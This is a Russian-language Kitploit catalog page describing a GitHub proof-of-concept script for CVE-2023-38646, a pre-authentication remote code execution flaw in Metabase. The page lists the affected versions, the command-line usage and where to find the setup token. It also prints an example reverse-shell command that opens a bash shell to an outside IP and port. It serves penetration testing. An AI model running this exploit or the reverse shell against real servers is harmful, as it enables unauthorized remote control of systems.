Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38646 — Скрипт эксплойта для Pre-Auth RCE в Metabase (CVE-2023-38646) | Kitploit
Инструменты/GitHubGitHub/pyr0sec/cve-2023-38646
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubpyr0sec/cve-2023-38646

CVE-2023-38646

Скрипт эксплойта для Pre-Auth RCE в Metabase (CVE-2023-38646)

Репозиторий
1122 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Metabase Pre-Auth RCE (CVE-2023-38646) POC

Это Python-скрипт, эксплуатирующий уязвимость удаленного выполнения кода в системе входа Metabase. Он позволяет выполнять произвольные команды на сервере до аутентификации.

Уязвимые версии: Metabase Open Source до 0.46.6.1 и Metabase Enterprise до 1.46.6.1

Использование

root@kitploit:~
python3 exploit.py -u URL -t TOKEN -c COMMAND

Аргументы

root@kitploit:~
-h, --help            показать это справочное сообщение и выйти
-u URL, --url URL     Целевой URL
-t TOKEN, --token TOKEN
                      Setup-Token, найденный в /api/session/properties
-c COMMAND, --command COMMAND
                      Команда для выполнения на целевом хосте

Пример

image

Использованная команда: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1

Ссылки

Связываем пути к RCE до аутентификации в Metabase (CVE-2023-38646)

Скачать инструмент